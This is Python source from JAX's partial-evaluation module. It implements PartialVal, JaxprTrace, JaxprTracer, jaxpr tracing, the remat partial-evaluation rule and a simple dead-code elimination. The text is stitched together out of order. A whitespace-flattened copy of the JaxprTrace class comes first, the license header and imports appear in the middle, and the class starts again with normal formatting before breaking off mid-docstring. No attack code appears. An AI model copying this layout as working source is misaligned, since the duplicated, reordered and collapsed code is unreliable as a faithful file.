`JaxprTrace` class. 
class JaxprTrace(Trace): def pure(self, val): return self.new_const(val) def lift(self, val): return self.new_const(val) def sublift(self, val): return JaxprTracer(self, val.pval, FreeVar(val)) def new_const(self, val): if isinstance(val, Tracer) and val._trace.level == self.level: raise Exception return JaxprTracer(self, PartialVal.known(val), unit) def new_instantiated_literal(self, val): return JaxprTracer(self, PartialVal.unknown(get_aval(val)), Literal(val)) def new_instantiated_const(self, val): return JaxprTracer(self, PartialVal.unknown(get_aval(val)), ConstVar(val)) def new_arg(self, pval: PartialVal): return JaxprTracer(self, pval, LambdaBinding()) def instantiate_const(self, tracer): const = tracer.pval.get_known() if const is None: return tracer else: if type(const) in core.literalable_types and onp.shape(const) == (): return self.new_instantiated_literal(const) else: return self.new_instantiated_const(const) def instantiate_const_abstracted(self, tracer): const = tracer.pval.get_known() if const is None: return tracer else: aval = raise_to_shaped(get_aval(const), onp.isscalar(const)) return JaxprTracer(self, PartialVal.unknown(aval), ConstVar(const)) def process_primitive(self, primitive, tracers, params): if primitive in custom_partial_eval_rules: return custom_partial_eval_rules[primitive](self, *tracers, **params) else: return self.default_process_primitive(primitive, tracers, params) def default_process_primitive(self, primitive, tracers, params): """By default, if all the input tracers are known, then execute the primitive and all the ouputs are known. 
Otherwise, all the outputs are unknown.""" consts = tuple(t.pval.get_known() for t in tracers) if all(c is not None for c in consts): return primitive.bind(*consts, **params) tracers = map(self.instantiate_const, tracers) avals = [t.aval for t in tracers] out_aval = primitive.abstract_eval(*avals, **params) if primitive.multiple_results: out_tracers = [JaxprTracer(self, PartialVal.unknown(aval), None) for aval in out_aval] eqn = new_eqn_recipe(tracers, out_tracers, primitive, params) for t in out_tracers: t.recipe = eqn return out_tracers else: out_tracer = JaxprTracer(self, PartialVal.unknown(out_aval), None) out_tracer.recipe = new_eqn_recipe(tracers, [out_tracer], primitive, params) return out_tracer def process_call(self, call_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if (self.master.trace_type is StagingJaxprTrace and call_primitive in staged_out_calls): tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) if call_primitive in call_partial_eval_rules: return call_partial_eval_rules[call_primitive](self, call_primitive, f, tracers, params) in_pvs, in_consts = unzip2([t.pval for t in tracers]) fun, aux = partial_eval(f, self, in_pvs) out_flat = call_primitive.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env_tracers = map(self.full_raise, env) out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) if not jaxpr.eqns: env = {core.unitvar: core.unit} map(env.setdefault, jaxpr.invars, (*env_tracers, *tracers)) map(env.setdefault, jaxpr.constvars, consts) return [pv_const if pv is None else v.val if type(v) is Literal else env[v] for v, pv, pv_const in zip(jaxpr.outvars, out_pvs, out_pv_consts)] const_tracers = map(self.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, 
out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_call(self, call_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs, out_pv_consts = unzip2(t.pval for t in out_tracers) out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) env_tracers = map(trace.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, call_jaxpr=lifted_jaxpr) # The `jaxpr` already contains the env_vars at start of invars eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers)), out_tracers, call_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_map(self, map_primitive, f: lu.WrappedFun, tracers, params): name = params.get('name', f.__name__) if self.master.trace_type is StagingJaxprTrace: tracers = map(self.instantiate_const_abstracted, tracers) else: name = wrap_name(name, 'pe') params = dict(params, name=name) in_pvs, in_consts = unzip2([t.pval for t in tracers]) reduced_pvs = [None if pv is None else _mapped_aval(params['axis_size'], pv) if m else pv for pv, m in zip(in_pvs, params['mapped_invars'])] fun, aux = partial_eval(f, self, reduced_pvs) out_flat = map_primitive.bind(fun, *in_consts, **params) out_pvs_reduced, jaxpr, env = aux() out_pv_consts, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvs = [None if pv is None else 
_unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] const_tracers = map(self.new_instantiated_const, consts) env_tracers = map(self.full_raise, env) lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(self, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] # The `jaxpr` already contains the env_vars at start of invars new_params = dict(params, mapped_invars=((True,) * len(const_tracers) + (False,) * len(env_tracers) + params['mapped_invars']), call_jaxpr=lifted_jaxpr) assert (len(new_params['mapped_invars']) == len(const_tracers) + len(env_tracers) + len(tracers)) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, env_tracers, tracers)), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers def post_process_map(self, map_primitive, out_tracers, params): jaxpr, consts, env = tracers_to_jaxpr([], out_tracers) out_pvs_reduced, out_pv_consts = unzip2(t.pval for t in out_tracers) out_pvs = [None if pv is None else _unmapped_aval(params['axis_size'], pv) for pv in out_pvs_reduced] out = out_pv_consts + consts del consts, out_pv_consts master = self.master def todo(x): n = len(jaxpr.outvars) out_pv_consts, consts = x[:n], x[n:] trace = JaxprTrace(master, core.cur_sublevel()) const_tracers = map(trace.new_instantiated_const, consts) # The `jaxpr` already contains the env_vars at start of invars lifted_jaxpr = convert_constvars_jaxpr(jaxpr) out_tracers = [JaxprTracer(trace, PartialVal((out_pv, out_pv_const)), None) for out_pv, out_pv_const in zip(out_pvs, out_pv_consts)] new_params = dict(params, mapped_invars=tuple([True] * len(const_tracers) + [False] * len(env)), call_jaxpr=lifted_jaxpr) env_tracers = map(trace.full_raise, env) eqn = new_eqn_recipe(it.chain(const_tracers, env_tracers), out_tracers, map_primitive, new_params) for t in out_tracers: t.recipe = eqn return out_tracers return out, todo def process_custom_jvp_call(self, prim, fun, jvp, 
tracers): # See comment at top of `JaxprTrace`. This method should be reachable # only when we stage out, and in that case we drop the custom differentiation # rules, because we do not need them. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees): # See comment in the above process_custom_jvp_call method. assert self.master.trace_type is StagingJaxprTrace return fun.call_wrapped(*tracers) # This subclass is used just for its type tag (see comment for `JaxprTrace`) # This switches the behavior of process_call to stage out into the jaxpr any # call primitives encountered (rather than doing partial evaluation into the call). class StagingJaxprTrace(JaxprTrace): pass def _mapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): # might be raising abstraction level from Concrete here assert aval.shape[0] == size return ShapedArray(aval.shape[1:], aval.dtype) else: raise TypeError(aval) def _unmapped_aval(size, aval): if aval is core.abstract_unit: return aval elif isinstance(aval, ShapedArray): return ShapedArray((size,) + aval.shape, aval.dtype) else: raise TypeError(aval) custom_partial_eval_rules: Dict[core.Primitive, Callable] = {} call_partial_eval_rules: Dict[core.Primitive, Callable] = {} staged_out_calls: Set[core.Primitive] = set() def partial_eval(f, trace, pvs: Sequence[Optional[AbstractValue]], instantiate=False): f = trace_to_subjaxpr(f, trace.master, instantiate) return partial_eval_wrapper(f, tuple(pvs)) @lu.transformation_with_aux def partial_eval_wrapper(avals: Sequence[Optional[AbstractValue]], *consts): py_args = (map(PartialVal, zip(avals, consts)),) jaxpr, (out_pvals, consts, env) = yield py_args, {} out_pvs, out_consts = unzip2(out_pvals) out = tuple(out_consts) + tuple(consts) # TODO: can consts be traced? 
  yield out, (out_pvs, jaxpr, env)

def abstract_eval_fun(fun, *avals, **params):
  """Abstractly evaluates `fun` on the given input avals, returning output avals."""
  pvals_in = [PartialVal.unknown(a) for a in avals]
  _, pvals_out, _ = trace_to_jaxpr(lu.wrap_init(fun, params), pvals_in,
                                   instantiate=True, stage_out=True)
  avals_out, _ = unzip2(pvals_out)
  for aval_out in avals_out:
    assert isinstance(aval_out, AbstractValue)  # instantiate=True
  return avals_out


class JaxprTracer(Tracer):
  """Tracer for partial evaluation.

  Carries a `PartialVal` plus the `recipe` recording how the value was
  produced: a LambdaBinding, FreeVar, ConstVar, Literal, `unit`, or a
  JaxprEqnRecipe (see `tracers_to_jaxpr`, which consumes these recipes).
  """
  __slots__ = ['pval', 'recipe']

  def __init__(self, trace, pval: PartialVal, recipe):
    assert isinstance(pval, PartialVal)
    pv, const = pval
    # A known constant that is itself a tracer from a higher (or equal) trace
    # level has escaped its trace; report it rather than silently capturing it.
    if isinstance(const, Tracer) and const._trace.level >= trace.level:
      raise core.escaped_tracer_error(
          "Tracer from a higher level: {} in trace {}".format(const, trace))
    self._trace = trace
    self.pval = pval
    self.recipe = recipe

  def __repr__(self):
    return 'Traced<{}:{}>'.format(self.aval, self._trace)

  @property
  def aval(self):
    return self.pval.get_aval()

  @property
  def parents(self):
    # Only equation recipes have input tracers; the other recipe kinds are leaves.
    if isinstance(self.recipe, JaxprEqnRecipe):
      return self.recipe.invars
    else:
      return []

  def full_lower(self):
    # A known tracer can be lowered to its underlying known value.
    known = self.pval.get_known()
    if known is not None:
      return core.full_lower(known)
    else:
      return self

# TODO(necula): this should return a TypedJaxpr
# TODO(necula): remove stage_out, replace trace_type=pe.StagingJaxprTrace
def trace_to_jaxpr(fun: lu.WrappedFun, pvals: Sequence[PartialVal],
                   instantiate: Union[bool, Sequence[bool]] = False,
                   stage_out=False, bottom=False,
                   trace_type: Optional[Type[Trace]] = None) \
    -> Tuple[Jaxpr, Tuple[PartialVal, ...], Tuple[core.Value, ...]]:
  """Traces a function into a Jaxpr, given PartialVals for inputs.

  `trace_type` can be one of `StagingJaxprTrace` or `JaxprTrace` (see
  comments for that class).

  Returns (`jaxpr`, `out_pvals`, `consts`).
  The `jaxpr` contains only the computation that depends on unknown inputs.
  The `out_pvals` are the PartialVal for the outputs.
The intermediate values that depend only on known inputs and are needed to compute the output of `jaxpr` are in `consts` and are passed in as the constvars of the `jaxpr`. The handling of the known outputs depends on `instantiate`. For example, given `fun` defined as follows:: def fun(ki, ui): # ki will be a known input in this example ka = ki + 2 kb = ka + 3 return (kb, ui + ka) with `ki` the known PartialVal `1.`, and `ui` an unknown PartialVal. The only computation that depends on unknown inputs is `ui + ka` and will be the only computation in the body of the `jaxpr`. This computation depends on the known intermediate value `ka`, which will be computed statically. Currently, such constants are either embedded in the Jaxpr if they are scalars, or passed as a constvar to `jaxpr`, and then the value of the actual constant will be in `consts`: When `instantiate=False` we get:: jaxpr = { lambda ka ; ki ui. let c = add ui ka in (*, c) } # known outputs are `*` out_pvals = [known(6), unknown(ShapedArray)] # the known outputs are known PartialVal consts = [3] # the constant for `ka` When `instantiate=True` we get:: jaxpr = { lambda ka kb ; ki ui. 
let c = add ui ka in (kb, c) } # known output are explicit out_pvals = [abstract(ConcreteArray(6)), abstract(ShapedArray)] # all are unknown PartialVal consts = [3, 6] # values for `ka` and `kb` constvars """ trace_type = trace_type or (StagingJaxprTrace if stage_out else JaxprTrace) with new_master(trace_type, bottom=bottom) as master: fun = trace_to_subjaxpr(fun, master, instantiate) jaxpr, (out_pvals, consts, env) = fun.call_wrapped(pvals) assert not env del master return jaxpr, out_pvals, consts @lu.transformation def trace_to_subjaxpr(master: core.MasterTrace, instantiate: Union[bool, Sequence[bool]], pvals: Sequence[PartialVal]): assert all([isinstance(pv, PartialVal) for pv in pvals]), pvals trace = JaxprTrace(master, core.cur_sublevel()) in_tracers = map(trace.new_arg, pvals) ans = yield in_tracers, {} instantiate = [instantiate] * len(ans) if isinstance(instantiate, bool) else instantiate out_tracers = map(trace.full_raise, map(core.full_lower, ans)) out_tracers = map(partial(instantiate_const_at, trace), instantiate, out_tracers) jaxpr, consts, env = tracers_to_jaxpr(in_tracers, out_tracers) out_pvals = [t.pval for t in out_tracers] del trace, in_tracers, out_tracers yield jaxpr, (out_pvals, consts, env) def instantiate_const_at(trace, instantiate: bool, tracer): if instantiate: return trace.instantiate_const(trace.full_raise(tracer)) else: return tracer FreeVar = namedtuple('FreeVar', ['val']) ConstVar = namedtuple('ConstVar', ['val']) LambdaBinding = namedtuple('LambdaBinding', []) JaxprEqnRecipe = namedtuple('JaxprEqnRecipe', ['eqn_id', 'invars', 'outvars', 'primitive', 'params']) def new_eqn_recipe(invars, outvars, primitive, params): """Constructs a new JaxEqnRecipe. Params: invars: the tracers for the primitive inputs. outvars: the tracers for the primitive outputs. primitive: the primitive. 
    params: the primitive params
  """
  # TODO(necula): move these checks to core.check_jaxpr, and call in more places
  if primitive.call_primitive or primitive.map_primitive:
    assert "call_jaxpr" in params
  if primitive.map_primitive:
    assert "mapped_invars" in params
  # eqn_id is a fresh object(): recipes shared by several output tracers are
  # deduplicated by this identity in tracers_to_jaxpr.  The output tracers are
  # held by weakref so dead outputs can be dropped (see recipe_to_eqn).
  return JaxprEqnRecipe(object(), tuple(invars), map(ref, outvars), primitive,
                        params)

def recipe_to_eqn(unused_var, getvar, recipe):
  """Converts a JaxprEqnRecipe into a JaxprEqn.

  `unused_var` is a nullary callable producing a fresh variable for outputs
  whose tracers have been garbage-collected (their weakrefs return None);
  `getvar` maps a live tracer to its Jaxpr variable.
  """
  _, in_tracers, out_tracer_refs, primitive, params = recipe
  # Dereference the weakrefs; collected output tracers become None.
  out_tracers = [t_ref() for t_ref in out_tracer_refs]
  invars = [getvar(t) for t in in_tracers]
  outvars = [unused_var() if t is None else getvar(t) for t in out_tracers]
  return new_jaxpr_eqn(invars, outvars, primitive, params)

def tracers_to_jaxpr(in_tracers, out_tracers):
  """Constructs Jaxpr given tracers for inputs and outputs.

  Params:
    in_tracers: the tracers that were created for the function inputs
    out_tracers: the tracers that were output by the function.

  Returns: a triple of a `Jaxpr`, a list of constant values corresponding to
    the `constvars` in the returned Jaxpr, and a list of environment values.
    The vars for the environment values have been prepended to the Jaxpr's
    `invars`.
""" newvar = core.gensym('') t_to_var = {} def getvar(t): var = t_to_var.get(id(t)) if var is None: aval = t.pval.get_aval() if not t.pval.is_known() else abstract_unit var = t_to_var[id(t)] = newvar(aval) return var sorted_tracers = toposort(out_tracers) invars = map(getvar, in_tracers) eqns = [] env = {} consts = {} const_to_var = {} def getconstvar(c): var = const_to_var.get(id(c)) if var is None: var = const_to_var[id(c)] = newvar(get_aval(c)) return var processed_eqn_ids = set() for t in sorted_tracers: recipe = t.recipe if isinstance(recipe, JaxprEqnRecipe): if recipe.eqn_id not in processed_eqn_ids: eqns.append(recipe_to_eqn(lambda: newvar(core.abstract_unit), getvar, recipe)) processed_eqn_ids.add(recipe.eqn_id) elif isinstance(recipe, LambdaBinding): if not any(t is in_tracer for in_tracer in in_tracers): raise core.escaped_tracer_error( "Tracer not among input tracers {}".format(t)) assert in_tracers, "Lambda binding with no args" elif isinstance(recipe, FreeVar): env[getvar(t)] = recipe.val elif isinstance(recipe, ConstVar): v = t_to_var[id(t)] = getconstvar(recipe.val) consts[v] = recipe.val elif isinstance(recipe, Literal): t_to_var[id(t)] = recipe elif recipe is unit: t_to_var[id(t)] = unitvar else: raise TypeError(recipe) env_vars, env_vals = unzip2(env.items()) const_vars, const_vals = unzip2(consts.items()) # The env_vars are pre-pended to the invars jaxpr = Jaxpr(const_vars, list(it.chain(env_vars, invars)), list(map(getvar, out_tracers)), eqns) core.skip_checks or core.check_jaxpr(jaxpr) return jaxpr, const_vals, env_vals @cache() def convert_constvars_jaxpr(jaxpr): """Moves the constvars to the start of invars.""" core.skip_checks or core.check_jaxpr(jaxpr) lifted_jaxpr = Jaxpr(constvars=(), invars=jaxpr.constvars + jaxpr.invars, outvars=jaxpr.outvars, eqns=jaxpr.eqns) core.skip_checks or core.check_jaxpr(lifted_jaxpr) return lifted_jaxpr def partial_eval_jaxpr(jaxpr: TypedJaxpr, unknowns: Sequence[bool], instantiate: Union[bool, 
Sequence[bool]], trace_type: Optional[Type[core.Trace]] ) -> Tuple[TypedJaxpr, TypedJaxpr, Sequence[bool]]: """Specializes a Jaxpr given an indication of which inputs are known. Returns: (jaxpr_known, jaxpr_unknown, out_unknowns). `out_unknowns` specifies which outputs are unknown (depend on some unknown inputs). `jaxpr_known` takes the same inputs as `jaxpr`, ignores the unknown inputs, and performs *all* the computation in `jaxpr` that depends only on the known inputs. Outputs correspond to those of `jaxpr`, with the unknown ones replaced with `*`, appended with the known residuals (the intermediate computations in `jaxpr` that depend only on known inputs and that are needed to compute the unknown outputs). `jaxpr_unknown` takes the same inputs as `jaxpr` along with the known residuals computed by `jaxpr_known` and returns the same outputs as `jaxpr` with the known outputs replaced by `*`. Roughly, `jaxpr(ki, ui)` is decomposed assuming `ki` and `ui` are the known and respectively unknown inputs into: jaxpr(ki, ui) = let kout, _, kresidual = jaxpr_known(kin, *) let _, uout = jaxpr_unknown(ki, ui, kresidual) in (kout, uout) For example, if `jaxpr` is lambda ki, ui: let ka = ki + 2 in (ki + 3, ui + ka)" then `jaxpr_known` = lambda ki, ui: let ka = ki + 2 in (ki + 3, *, ka) 'jaxpr_unknown` = lambda ki, ui, ka: (*, ui + ka) """ f = lu.wrap_init(core.jaxpr_as_fun(jaxpr)) cell = [] def fun(*vals): pvals = [PartialVal.unknown(aval) if uk else PartialVal.known(val) for aval, val, uk in zip(jaxpr.in_avals, vals, unknowns)] jaxpr_2, out_pvals_2, consts_2 = trace_to_jaxpr(f, pvals, instantiate=instantiate, trace_type=trace_type) out_pvs_2, out_consts_2 = unzip2(out_pvals_2) cell.append((out_pvs_2, jaxpr_2, len(consts_2))) return out_consts_2 + consts_2 # For jaxpr_known we pass core.unit for the unknown inputs, and known PartialVal for the # known inputs. 
pvals = [PartialVal.unknown(abstract_unit) if uk else PartialVal.unknown(aval) for aval, uk in zip(jaxpr.in_avals, unknowns)] jaxpr_1, out_pvals, consts_1 = trace_to_jaxpr(lu.wrap_init(fun), pvals, instantiate=True) (out_pvs_2, jaxpr_2, num_res), = cell assert len(jaxpr_2.constvars) == num_res # jaxpr :: a -> b # jaxpr_1 :: a1 -> [b1, res] # jaxpr_2 :: res | a2 -> b2 # jaxpr_2 :: [a2, res] -> b2 jaxpr_2 = convert_constvars_jaxpr(jaxpr_2) jaxpr_2.invars = jaxpr_2.invars[num_res:] + jaxpr_2.invars[:num_res] for var, unknown in zip(jaxpr_2.invars[:len(unknowns)], unknowns): if not unknown: var.aval = abstract_unit uk_out = [pv is not None for pv in out_pvs_2] in_avals_1, in_avals_2 = unzip2(map(_split_aval, unknowns, jaxpr.in_avals)) out_avals_1, out_avals_2 = unzip2(map(_split_aval, uk_out, jaxpr.out_avals)) # out_avals_1 and in_avals_2 need the residuals added out_pvs, _ = unzip2(out_pvals) res_avals = out_pvs[len(jaxpr.out_avals):] assert len(res_avals) == num_res out_avals_1 = out_avals_1 + res_avals in_avals_2 = in_avals_2 + res_avals typed_jaxpr_1 = TypedJaxpr(jaxpr_1, consts_1, in_avals_1, out_avals_1) typed_jaxpr_2 = TypedJaxpr(jaxpr_2, (), in_avals_2, out_avals_2) return typed_jaxpr_1, typed_jaxpr_2, uk_out def _split_aval(unknown, aval): return (abstract_unit, aval) if unknown else (aval, abstract_unit) remat_call_p = core.Primitive('remat_call') remat_call_p.call_primitive = True remat_call = partial(core.call_bind, remat_call_p) remat_call_p.def_custom_bind(remat_call) remat_call_p.def_impl(core.call_impl) remat_call_p.multiple_results = True def _remat_partial_eval(trace, _, f, tracers, params): concrete = params['concrete'] # Unlike JaxprTrace.process_call, we want to form a jaxpr for the entirety of # the function being called, not just for the unknown parts. To do that, we # instantiate all the input tracers as constants in the jaxpr being formed. 
# Those tracers might have concrete avals, and doing abstract interpretation # on concrete avals engenders a tradeoff: it allows data-dependent Python # control flow to work, but it can in some cases lead to redundant FLOPs (done # both in the `bind` call below and the `core.jaxpr_as_fun` call). We use the # `concrete` parameter to switch this behavior, and if `concrete` is False # then we raise the avals to the Shaped level. if concrete: instantiated_tracers = map(trace.instantiate_const, tracers) else: instantiated_tracers = map(trace.instantiate_const_abstracted, tracers) # Using the instantiated tracers, run call_bind like JaxprTrace.process_call. in_pvs, in_consts = unzip2(t.pval for t in instantiated_tracers) fun, aux = partial_eval(f, trace, in_pvs) with core.initial_style_staging(): out_flat = remat_call_p.bind(fun, *in_consts, **params) out_pvs, jaxpr, env = aux() env = map(trace.full_raise, env) out_pval_consts1, consts = split_list(out_flat, [len(out_flat)-len(jaxpr.constvars)]) out_pvals1 = [PartialVal((pv, const)) for pv, const in zip(out_pvs, out_pval_consts1)] # Since we traced with everything marked as unknown, but we need to know which # outputs are known/unknown, we use partial_eval_jaxpr to get out_unknowns. in_avals = ([raise_to_shaped(t.pval.get_aval()) for t in env] + [raise_to_shaped(pv) for pv in in_pvs]) out_avals = [raise_to_shaped(pv if pv is not None else abstract_unit if var is unitvar else get_aval(var.val) if type(var) is Literal else get_aval(const)) for var, pv, const in zip(jaxpr.outvars, out_pvs, out_pval_consts1)] typed_jaxpr = core.TypedJaxpr(jaxpr, consts, in_avals, out_avals) in_unknowns = [t.pval[0] is not None for t in it.chain(env, tracers)] jaxpr_1, jaxpr_2, out_unknowns = partial_eval_jaxpr(typed_jaxpr, in_unknowns, instantiate=False, trace_type=trace.master.trace_type) num_res = len(jaxpr_1.out_avals) - len(jaxpr_2.out_avals) # First, we prune the jaxpr to be staged out not to have too many outputs. 
typed_jaxpr = _dce_jaxpr(typed_jaxpr, out_unknowns) # Next, we need values for the outputs that should be known. Since consts # weren't passed through Python for evaluation, we need to evaluate jaxpr_1, # minus the residual outputs that we don't need. When `concrete=True`, as an # optimization we can avoid redoing *some* redundant FLOPs, namely those that # produced concrete avals at the output, simply by using those as computed # values. For the use case of reverse-mode ad in op-by-op ("eager mode") # evaluation, all the primal outputs should be concrete (thus not recomputed). to_compute = [not uk and type(pv) is not ConcreteArray for uk, pv in zip(out_unknowns, out_pvs)] jaxpr_1_primals = _dce_jaxpr(jaxpr_1, to_compute + [False] * num_res) _, in_consts = unzip2(t.pval for t in it.chain(env, tracers)) out_pval_consts2 = core.jaxpr_as_fun(jaxpr_1_primals)(*in_consts)[:-num_res or None] out_pvals = map(_reconstruct_pval, out_pvals1, out_pval_consts2, out_unknowns) # Now that we have out_pvals, the rest is just like JaxprTrace.process_call. instantiated_tracers = env + instantiated_tracers const_tracers = map(trace.new_instantiated_const, consts) lifted_jaxpr = convert_constvars_jaxpr(typed_jaxpr.jaxpr) out_tracers = [JaxprTracer(trace, out_pval, None) for out_pval in out_pvals] new_params = dict(params, call_jaxpr=lifted_jaxpr) eqn = new_eqn_recipe(tuple(it.chain(const_tracers, instantiated_tracers)), out_tracers, remat_call_p, new_params) for t in out_tracers: t.recipe = eqn return out_tracers call_partial_eval_rules[remat_call_p] = _remat_partial_eval def _dce_jaxpr(typed_jaxpr, outputs): # This dead-code elimination is pretty rudimentary, and in particular doesn't # nontrivially DCE through scan, call, or other higher-order primitives. 
# TODO(mattjj): better DCE jaxpr = typed_jaxpr.jaxpr outvars, out_avals = jaxpr.outvars, typed_jaxpr.out_avals out_pairs = [(var, aval) if output else (unitvar, core.abstract_unit) for var, aval, output in zip(outvars, out_avals, outputs)] new_outvars, new_out_avals = unzip2(out_pairs) needed_vars = {v for v in new_outvars if type(v) is not Literal} new_eqns = [] for eqn in jaxpr.eqns[::-1]: if set(eqn.outvars) & needed_vars: new_eqns.append(eqn) needed_vars.update(v for v in eqn.invars if type(v) is not Literal) new_eqns = new_eqns[::-1] new_jaxpr = core.Jaxpr(jaxpr.constvars, jaxpr.invars, new_outvars, new_eqns) return core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, typed_jaxpr.in_avals, new_out_avals) def _reconstruct_pval(pval1: PartialVal, const2: core.Value, unknown: bool): pv1, _ = pval1 if unknown or pval1.is_known(): return pval1 else: if type(pv1) is ConcreteArray: return PartialVal.known(pv1.val) else: return PartialVal.known(const2) def move_binders_to_front(typed_jaxpr: TypedJaxpr, to_move: Sequence[bool]) -> TypedJaxpr: """Reorder the `invars` to move to front the ones for which `to_move` is True.""" assert not typed_jaxpr.jaxpr.constvars assert len(typed_jaxpr.in_avals) == len(to_move) new_invars = _move_to_front(typed_jaxpr.jaxpr.invars, to_move) new_jaxpr = core.Jaxpr((), new_invars, typed_jaxpr.jaxpr.outvars, typed_jaxpr.jaxpr.eqns) new_in_avals = _move_to_front(typed_jaxpr.in_avals, to_move) new_typed_jaxpr = core.TypedJaxpr(new_jaxpr, typed_jaxpr.literals, new_in_avals, typed_jaxpr.out_avals) return new_typed_jaxpr def _move_to_front(lst: Sequence, to_move: Sequence[bool]) -> Sequence: return ([elt for elt, move in zip(lst, to_move) if move] + [elt for elt, move in zip(lst, to_move) if not move])
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import itertools as it from collections import namedtuple import contextlib import threading from typing import Callable, Dict, Optional, Sequence, Set, Tuple, Type, Union from weakref import ref import numpy as onp from .. import core from .. import linear_util as lu from ..abstract_arrays import ShapedArray, ConcreteArray, raise_to_shaped from ..ad_util import zero from ..util import (unzip2, safe_zip, safe_map, toposort, partial, split_list, wrap_name, cache) from ..core import (Trace, Tracer, new_master, Jaxpr, Literal, get_aval, AbstractValue, unit, unitvar, abstract_unit, TypedJaxpr, new_jaxpr_eqn) map = safe_map zip = safe_zip def identity(x): return x class PartialVal(tuple): """Partial value: either a known value or an unknown (abstract) value. Represented as a pair `(aval_opt, const)` of one of two kinds: * `(None, <Constant>)` indicates a known value, either a Python regular value, or a Tracer. * `(<AbstractValue>, *)` indicates an unknown value characterized by an abstract value. 
""" def __new__(cls, xs: Tuple[Optional[AbstractValue], core.Value]): pv, const = xs if not core.skip_checks: # type checks assert isinstance(pv, (AbstractValue, type(None))), xs assert isinstance(const, core.Tracer) or const is zero or core.valid_jaxtype(const), xs # invariant checks if isinstance(pv, AbstractValue): assert const == core.unit, xs return tuple.__new__(cls, xs) @classmethod def known(cls, const: core.Value) -> 'PartialVal': return PartialVal((None, const)) @classmethod def unknown(cls, aval: AbstractValue) -> 'PartialVal': return PartialVal((aval, core.unit)) def is_known(self): return self[0] is None def get_known(self) -> Optional[core.Value]: """Get the known value, if known, else None.""" return self[1] if self[0] is None else None def get_aval(self) -> AbstractValue: """Get the AbstractValue either directly for unknown values, or from the known constant.""" known = self.get_known() if known is not None: return get_aval(known) else: return self[0] def merge_with_known(self, val: core.Value) -> core.Value: """Either the stored known value, or the given 'val'.""" known = self.get_known() return known if known is not None else val # We form Jaxprs using `JaxprTrace` for three distinct purposes: # (1) to stage program representations completely out of the JAX system # (e.g. for XLA using jit or pmap). In this case we are using the # `StagingJaxprTrace` subclass. # (3) to linearize a function for reverse-mode AD. In this case we are # using the `JaxprTrace` subclass. # (2) to build a representation of a function that may require further JAX # transformations (e.g. in "initial-style" higher-order primitives, like # for control flow). In this case we use the `JaxprTrace` class. 
class JaxprTrace(Trace):
  # --- Trace interface: lifting values into this trace ---

  def pure(self, val):
    return self.new_const(val)

  def lift(self, val):
    return self.new_const(val)

  def sublift(self, val):
    # Re-wrap a tracer from a lower sublevel, recording it as a free variable.
    return JaxprTracer(self, val.pval, FreeVar(val))

  def new_const(self, val):
    # A tracer from this very trace level cannot be treated as a constant.
    if isinstance(val, Tracer) and val._trace.level == self.level:
      raise Exception
    return JaxprTracer(self, PartialVal.known(val), unit)

  def new_instantiated_literal(self, val):
    # Scalar constants of literalable type are inlined as Literals.
    return JaxprTracer(self, PartialVal.unknown(get_aval(val)), Literal(val))

  def new_instantiated_const(self, val):
    return JaxprTracer(self, PartialVal.unknown(get_aval(val)), ConstVar(val))

  def new_arg(self, pval: PartialVal):
    return JaxprTracer(self, pval, LambdaBinding())

  def instantiate_const(self, tracer):
    """Turns a known tracer into an unknown one backed by a Literal or ConstVar."""
    const = tracer.pval.get_known()
    if const is None:
      return tracer
    else:
      if type(const) in core.literalable_types and onp.shape(const) == ():
        return self.new_instantiated_literal(const)
      else:
        return self.new_instantiated_const(const)

  def instantiate_const_abstracted(self, tracer):
    # Like instantiate_const, but raises the aval to the Shaped level so the
    # traced jaxpr does not depend on the concrete constant value.
    const = tracer.pval.get_known()
    if const is None:
      return tracer
    else:
      aval = raise_to_shaped(get_aval(const), onp.isscalar(const))
      return JaxprTracer(self, PartialVal.unknown(aval), ConstVar(const))

  def process_primitive(self, primitive, tracers, params):
    if primitive in custom_partial_eval_rules:
      return custom_partial_eval_rules[primitive](self, *tracers, **params)
    else:
      return self.default_process_primitive(primitive, tracers, params)

  def default_process_primitive(self, primitive, tracers, params):
    """By default, if all the input tracers are known, then execute the primitive
    and all the outputs are known.
